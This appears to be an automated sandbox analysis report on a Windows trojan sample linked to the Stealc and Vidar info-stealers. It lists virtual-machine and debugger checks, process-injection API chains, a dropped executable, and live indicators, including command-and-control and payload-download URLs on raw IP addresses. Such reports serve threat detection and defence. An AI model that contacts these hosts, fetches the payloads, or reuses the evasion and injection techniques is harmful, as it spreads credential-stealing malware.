Source: Amcache.hve.5.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr | Binary or memory string: vmci.sys
Source: Amcache.hve.5.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.5.dr | Binary or memory string: vmci.syshbin`
Source: Amcache.hve.5.dr | Binary or memory string: \driver\vmci,\driver\pci
Source: VAIIBIHmtT.exe, 00000001.00000002.4170117651.0000000003319000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: Amcache.hve.5.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: VAIIBIHmtT.exe, 00000001.00000002.4169669321.000000000075F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWaT
Source: Amcache.hve.5.dr | Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr | Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: 81C9.tmp.exe, 00000002.00000002.2008489449.00000000007EE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: Amcache.hve.5.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: VAIIBIHmtT.exe, 00000001.00000002.4169669321.0000000000736000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: Amcache.hve.5.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr | Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr | Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr | Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.5.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | API call chain: ExitProcess graph end node | graph_2-26120
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | API call chain: ExitProcess graph end node | graph_2-26281
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | API call chain: ExitProcess graph end node | graph_2-26278
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | API call chain: ExitProcess graph end node | graph_2-26300
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | API call chain: ExitProcess graph end node | graph_2-26292
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | API call chain: ExitProcess graph end node | graph_2-26166
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | API call chain: ExitProcess graph end node | graph_2-26321
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_004072EC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 0_2_004072EC
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_004045C0 VirtualProtect ?,00000004,00000100,00000000 | 2_2_004045C0
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_00408BC5 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer | 0_2_00408BC5
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_005F0083 push dword ptr fs:[00000030h] | 0_2_005F0083
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_00740042 push dword ptr fs:[00000030h] | 0_2_00740042
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_0077081F mov eax, dword ptr fs:[00000030h] | 0_2_0077081F
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 1_2_0042FE7F mov eax, dword ptr fs:[00000030h] | 1_2_0042FE7F
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00419750 mov eax, dword ptr fs:[00000030h] | 2_2_00419750
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_007FB8A3 push dword ptr fs:[00000030h] | 2_2_007FB8A3
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00B399B7 mov eax, dword ptr fs:[00000030h] | 2_2_00B399B7
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00B20D90 mov eax, dword ptr fs:[00000030h] | 2_2_00B20D90
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00B2092B mov eax, dword ptr fs:[00000030h] | 2_2_00B2092B
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 1_2_0043BBE1 GetProcessHeap | 1_2_0043BBE1
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_0040A876 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 0_2_0040A876
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_00406215 SetUnhandledExceptionFilter | 0_2_00406215
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_004072EC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 0_2_004072EC
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_004080A5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 0_2_004080A5
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 1_2_0042A3F3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 1_2_0042A3F3
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 1_2_004104F3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 1_2_004104F3
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 1_2_00410686 SetUnhandledExceptionFilter | 1_2_00410686
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 1_2_0040F936 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 1_2_0040F936
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 2_2_0041AD48
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_0041CEEA SetUnhandledExceptionFilter | 2_2_0041CEEA
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 2_2_0041B33A
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00B3B5A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 2_2_00B3B5A1
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00B3D151 SetUnhandledExceptionFilter | 2_2_00B3D151
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00B3AFAF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 2_2_00B3AFAF
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Memory protected: page guard

                    HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: 81C9.tmp.exe PID: 7456, type: MEMORYSTR
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_00740110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess | 0_2_00740110
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Memory written: C:\Users\user\Desktop\VAIIBIHmtT.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 2_2_00419600
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00B39867 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 2_2_00B39867
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Process created: C:\Users\user\Desktop\VAIIBIHmtT.exe "C:\Users\user\Desktop\VAIIBIHmtT.exe"
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Process created: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe "C:\Users\user\AppData\Local\Temp\81C9.tmp.exe"
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_0075113B cpuid | 0_2_0075113B
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: GetLocaleInfoA | 0_2_0040D34C
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW | 1_2_0043B02A
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: GetLocaleInfoW | 1_2_004351E0
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: EnumSystemLocalesW | 1_2_0043B2ED
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: EnumSystemLocalesW | 1_2_0043B2A2
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: EnumSystemLocalesW | 1_2_0043B388
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW | 1_2_0043B415
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: GetLocaleInfoW | 1_2_0043B665
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP | 1_2_0043B78E
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: GetLocaleInfoW | 1_2_0043B895
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW | 1_2_0043B962
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: EnumSystemLocalesW | 1_2_00434DED
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree | 2_2_00417B90
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree | 2_2_00B37DF7
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_004029E0 GetNumberFormatW,GetTimeFormatW,GetModuleFileNameW,GetNumberFormatW,CreateJobObjectW,GetConsoleAliasExesW,CreateNamedPipeA,SetFileShortNameW,CreateProcessW,GetTimeFormatW,GetModuleFileNameW,TlsGetValue,SetEnvironmentVariableA,GetTimeFormatW,GetModuleFileNameW | 0_2_004029E0
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_00406F41 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter | 0_2_00406F41
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA | 2_2_00417850
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00417A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA | 2_2_00417A30
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_004027D0 GetNumberFormatW,SetFileAttributesA,GetCommConfig,GetNumberFormatW,GetLogicalDriveStringsW,VerifyVersionInfoW,GetComputerNameW,ClearCommBreak,EnumTimeFormatsW,GetTempFileNameW,IsBadCodePtr,ReadConsoleInputA,GetVersionExW,InterlockedIncrement,SetVolumeMountPointW,GlobalMemoryStatus | 0_2_004027D0
Source: Amcache.hve.5.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.5.dr | Binary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

Source: Yara match | File source: 2.3.81C9.tmp.exe.b70000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.81C9.tmp.exe.b70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.81C9.tmp.exe.b20e67.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.81C9.tmp.exe.b20e67.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.81C9.tmp.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.81C9.tmp.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2008550485.0000000000825000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1793176960.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 81C9.tmp.exe PID: 7456, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

                    Remote Access Functionality

Source: Yara match | File source: 2.3.81C9.tmp.exe.b70000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.81C9.tmp.exe.b70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.81C9.tmp.exe.b20e67.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.81C9.tmp.exe.b20e67.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.81C9.tmp.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.81C9.tmp.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2008550485.0000000000825000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1793176960.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 81C9.tmp.exe PID: 7456, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_0076228C Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext | 0_2_0076228C
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_007615B6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext | 0_2_007615B6
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 1_2_004218EC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext | 1_2_004218EC
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 1_2_00420C16 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext | 1_2_00420C16
MITRE ATT&CK Matrix (interactive matrix view; tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact)
Source | Detection | Scanner | Label
VAIIBIHmtT.exe | 50% | ReversingLabs | Win32.Trojan.Generic
VAIIBIHmtT.exe | 100% | Avira | HEUR/AGEN.1306958
VAIIBIHmtT.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe | 34% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | 34% | ReversingLabs |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://upx.sf.net | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
post-to-me.com | 104.21.56.70 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://62.204.41.177/edd20096ecef326d.php | true | | unknown
https://post-to-me.com/track_prt.php?sub=0&cc=DE | false | | unknown
http://62.204.41.177/ | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://post-to-me.com/track_prt.php?sub=&cc=DE | VAIIBIHmtT.exe, 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | | unknown
https://post-to-me.com/track_prt.php?sub= | VAIIBIHmtT.exe | false | | unknown
http://62.204.41.177/edd20096ecef326d.phpM | 81C9.tmp.exe, 00000002.00000002.2008550485.0000000000876000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://176.113.115.37/ScreenUpdateSync.exe8 | VAIIBIHmtT.exe, 00000001.00000002.4169795931.0000000000775000.00000004.00000020.00020000.00000000.sdmp, VAIIBIHmtT.exe, 00000001.00000003.4009441376.0000000000774000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://62.204.41.177/edd20096ecef326d.phpQ | 81C9.tmp.exe, 00000002.00000002.2008550485.0000000000876000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://176.113.115.37/ScreenUpdateSync.exe48rt8k8rt4rwe5rbSOFTWARE | VAIIBIHmtT.exe, 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | | unknown
https://post-to-me.com/ | VAIIBIHmtT.exe, 00000001.00000002.4169669321.0000000000736000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://upx.sf.net | Amcache.hve.5.dr | false | URL Reputation: safe | unknown
http://62.204.41.177) | 81C9.tmp.exe, 00000002.00000002.2008550485.0000000000825000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://62.204.41.177/= | 81C9.tmp.exe, 00000002.00000002.2008550485.000000000085A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://176.113.115.37/ScreenUpdateSync.exe | VAIIBIHmtT.exe, VAIIBIHmtT.exe, 00000001.00000002.4169795931.0000000000775000.00000004.00000020.00020000.00000000.sdmp, VAIIBIHmtT.exe, 00000001.00000003.4009441376.0000000000774000.00000004.00000020.00020000.00000000.sdmp, VAIIBIHmtT.exe, 00000001.00000002.4169669321.00000000006F8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://62.204.41.177/ows | 81C9.tmp.exe, 00000002.00000002.2008550485.000000000085A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://62.204.41.177 | 81C9.tmp.exe, 00000002.00000002.2008550485.0000000000825000.00000004.00000020.00020000.00000000.sdmp, 81C9.tmp.exe, 00000002.00000002.2008489449.00000000007EE000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
176.113.115.37 | unknown | Russian Federation | 49505 | SELECTELRU | false
62.204.41.177 | unknown | United Kingdom | 30798 | TNNET-ASTNNetOyMainnetworkFI | true
104.21.56.70 | post-to-me.com | United States | 13335 | CLOUDFLARENETUS | false
                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1542425
                                                    Start date and time:2024-10-25 22:36:08 +02:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 7m 50s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:10
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:VAIIBIHmtT.exe
                                                    renamed because original name is a hash value
                                                    Original Sample Name:35489d9dc0929e90b0b89b4f569df8c1.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.evad.winEXE@6/7@1/3
                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HCA Information:
                                                    • Successful, ratio: 98%
                                                    • Number of executed functions: 60
                                                    • Number of non-executed functions: 319
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                    • Excluded IPs from analysis (whitelisted): 20.42.73.29
                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    • VT rate limit hit for: VAIIBIHmtT.exe
Time | Type | Description
16:37:04 | API Interceptor | 1019x Sleep call for process: VAIIBIHmtT.exe modified
16:37:33 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
176.113.115.37 | CHHE6LLjWx.exe | malicious | Stealc, Vidar | 176.113.115.37/ScreenUpdateSync.exe
176.113.115.37 | hlyG1m5UmO.exe | malicious | Stealc, Vidar | 176.113.115.37/seed.exe
176.113.115.37 | M13W1o3scc.exe | malicious | Stealc | 176.113.115.37/ScreenUpdateSync.exe
176.113.115.37 | XQywAEbb9e.exe | malicious | Stealc, Vidar | 176.113.115.37/seed.exe
176.113.115.37 | file.exe | malicious | Stealc, Vidar | 176.113.115.37/seed.exe
62.204.41.177 | v32oH5Xhqw.exe | malicious | Stealc, Vidar | 62.204.41.177/edd20096ecef326d.php
104.21.56.70 | hlyG1m5UmO.exe | malicious | Stealc, Vidar |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
post-to-me.com | CHHE6LLjWx.exe | malicious | Stealc, Vidar | 172.67.179.207
post-to-me.com | hlyG1m5UmO.exe | malicious | Stealc, Vidar | 104.21.56.70
post-to-me.com | M13W1o3scc.exe | malicious | Stealc | 172.67.179.207
post-to-me.com | InstallSetup.exe | malicious | Stealc | 172.67.179.207
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | Bill Payment__8084746.html | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | ACTION required to activate your account - bp Supplier Portal.eml | malicious | Unknown | 172.66.0.126
CLOUDFLARENETUS | http://www.wattpad.com | malicious | Unknown | 104.22.74.216
CLOUDFLARENETUS | dekont_001.pdf.exe | malicious | Snake Keylogger | 188.114.97.3
CLOUDFLARENETUS | (No subject) (92).eml | malicious | Unknown | 104.18.65.57
CLOUDFLARENETUS | Setup.exe | malicious | LummaC | 188.114.96.3
CLOUDFLARENETUS | RobCheat.exe | malicious | Python Stealer, CStealer | 172.67.75.40
CLOUDFLARENETUS | botnet.arm5.elf | malicious | Mirai, Moobot | 104.30.170.32
CLOUDFLARENETUS | http://ERICADLERCLOTHING.com | malicious | Unknown | 188.114.96.3
SELECTELRU | la.bot.sh4.elf | malicious | Unknown | 92.53.102.17
SELECTELRU | la.bot.powerpc.elf | malicious | Unknown | 95.213.162.65
SELECTELRU | SecuriteInfo.com.Program.RemoteAdmin.904.16436.20637.exe | malicious | FlawedAmmyy | 95.213.191.237
SELECTELRU | jYDYjpSbvf.exe | malicious | LummaC, Amadey, Clipboard Hijacker, LummaC Stealer, RedLine, SmokeLoader, Stealc | 176.113.115.95
SELECTELRU | CHHE6LLjWx.exe | malicious | Stealc, Vidar | 176.113.115.37
SELECTELRU | file.exe | malicious | Clipboard Hijacker, Cryptbot | 188.68.221.152
SELECTELRU | 6706ad721d914_JuidePorison.exe | malicious | Unknown | 176.113.115.33
SELECTELRU | hlyG1m5UmO.exe | malicious | Stealc, Vidar | 176.113.115.37
SELECTELRU | SecuriteInfo.com.Win32.CrypterX-gen.10335.644.exe | malicious | Clipboard Hijacker, Cryptbot | 188.68.221.152
SELECTELRU | 248994713.exe | malicious | MicroClip, SmokeLoader | 31.184.253.220
TNNET-ASTNNetOyMainnetworkFI | v32oH5Xhqw.exe | malicious | Stealc, Vidar | 62.204.41.177
TNNET-ASTNNetOyMainnetworkFI | la.bot.sparc.elf | malicious | Unknown | 217.112.243.186
TNNET-ASTNNetOyMainnetworkFI | NK3SASJheq.exe | malicious | Stealc, Vidar | 62.204.41.176
TNNET-ASTNNetOyMainnetworkFI | jqLt8WnO6C.exe | malicious | Stealc, Vidar | 62.204.41.176
TNNET-ASTNNetOyMainnetworkFI | la.bot.sparc.elf | malicious | Unknown | 217.112.243.125
TNNET-ASTNNetOyMainnetworkFI | arm.elf | malicious | Mirai | 217.112.243.192
TNNET-ASTNNetOyMainnetworkFI | xU6Ys3r4la.exe | malicious | Stealc, Vidar | 62.204.41.176
TNNET-ASTNNetOyMainnetworkFI | na.elf | malicious | Mirai | 217.112.243.196
TNNET-ASTNNetOyMainnetworkFI | CHHE6LLjWx.exe | malicious | Stealc, Vidar | 62.204.41.176
TNNET-ASTNNetOyMainnetworkFI | na.elf | malicious | Mirai, Moobot | 62.204.52.104
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | RFQ_24196MR_PDF.vbs | malicious | GuLoader | 104.21.56.70
